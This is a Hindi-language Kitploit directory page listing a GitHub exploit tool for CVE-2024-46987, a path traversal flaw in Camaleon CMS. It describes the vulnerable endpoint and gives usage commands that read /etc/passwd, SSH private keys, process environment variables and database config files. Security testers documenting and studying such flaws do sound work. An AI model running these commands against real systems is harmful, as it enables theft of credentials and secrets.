Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-46987 — CVE-2024-46987 - Camaleon CMS LFI Exploit | Kitploit
उपकरण/GitHubGitHub/rival420/cve-2024-46987
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubrival420/cve-2024-46987

CVE-2024-46987

CVE-2024-46987 - Camaleon CMS LFI Exploit

रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-46987 - कैमेलियन CMS स्थानीय फ़ाइल सम्मिलन

कैमेलियन CMS के लिए प्रमाणित स्थानीय फ़ाइल सम्मिलन (LFI) शोषण।

भेद्यता

कैमेलियन CMS /admin/media/download_private_file एंडपॉइंट के माध्यम से एक प्रमाणित LFI हमले के लिए संवेदनशील है। file पैरामीटर ठीक से स्वच्छ नहीं किया गया है, जो सर्वर से मनमानी फ़ाइलों को पढ़ने के लिए पथ ट्रैवर्सल की अनुमति देता है।

प्रभावित संस्करण

  • कैमेलियन CMS < 2.8.2

आवश्यकताएँ

root@kitploit:~
pip install requests

उपयोग

root@kitploit:~
# Print file to terminal (default)
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token"

# Save to file
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token" -o passwd.txt

पैरामीटर

उदाहरण

root@kitploit:~
# Read passwd file
python3 exploit.py -u https://example.com -f /etc/passwd -t "auth_token"

# Read SSH keys
python3 exploit.py -u https://example.com -f /home/user/.ssh/id_rsa -t "auth_token" -o id_rsa

# Read environment variables
python3 exploit.py -u https://example.com -f /proc/self/environ -t "auth_token"

# Read application config
python3 exploit.py -u https://example.com -f /var/www/html/config/database.yml -t "auth_token"

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। इसका उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके परीक्षण की आपको स्पष्ट अनुमति है।

संदर्भ

  • CVE-2024-46987
  • Camaleon CMS
टूल डाउनलोड करें
पैरामीटरविवरण
-u, --urlलक्ष्य URL
-f, --fileपढ़ने के लिए फ़ाइल (जैसे, /etc/passwd)
-t, --tokenauth_token कुकी मान
-o, --outputआउटपुट फ़ाइल नाम (वैकल्पिक, सेट न होने पर टर्मिनल पर प्रिंट होता है)